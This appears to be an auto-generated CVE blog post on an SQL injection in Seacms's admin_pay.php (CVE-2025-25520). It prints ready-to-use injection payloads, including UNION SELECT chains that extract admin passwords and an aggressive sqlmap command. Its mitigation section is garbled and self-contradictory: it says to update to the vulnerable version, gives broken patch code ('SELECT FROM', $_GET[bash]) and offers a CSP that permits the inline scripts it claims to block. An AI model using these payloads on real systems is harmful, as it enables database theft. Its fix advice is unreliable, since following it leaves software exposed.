Seacms, SQL Injection, CVE-2025-25520 (Critical)

Listen to this Post

CVE-2025-25520 exploits an unauthenticated SQL injection flaw in Seacms v13.3 via the `admin_pay.php` endpoint. Attackers manipulate the `id` parameter to inject malicious SQL queries due to improper input sanitization. This allows database dumping, admin credential theft, or remote code execution. The vulnerability stems from direct concatenation of user-supplied input into SQL statements without prepared queries or escaping.

DailyCVE Form:

Platform: Seacms
Version: <13.3
Vulnerability: SQL Injection
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploit:

GET /admin_pay.php?id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))-- HTTP/1.1
Host: target.com

Detection:

sqlmap -u "http://target.com/admin_pay.php?id=1" --risk=3 --level=5

Mitigation:

1. Update to Seacms ≥13.3.

  1. Apply WAF rules blocking SQL meta-characters (', --, /).

3. Patch `admin_pay.php` with prepared statements:

$stmt = $conn->prepare("SELECT FROM payments WHERE id = ?");
$stmt->bind_param("i", $_GET[bash]);

Log Analysis:

grep 'admin_pay.php' /var/log/apache2/access.log | egrep -i "union|select|concat"

Exploit Chain:

1. Enumerate tables:

id=1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables--

2. Extract credentials:

id=1' UNION SELECT 1,password,3 FROM admin_users--

Protection:

  • Disable `magic_quotes_gpc` if enabled (deprecated in PHP 5.4+).
  • Implement CSP headers to restrict inline scripts.
    add_header Content-Security-Policy "default-src 'self'; script-src 'unsafe-inline'";
    

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-25520
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top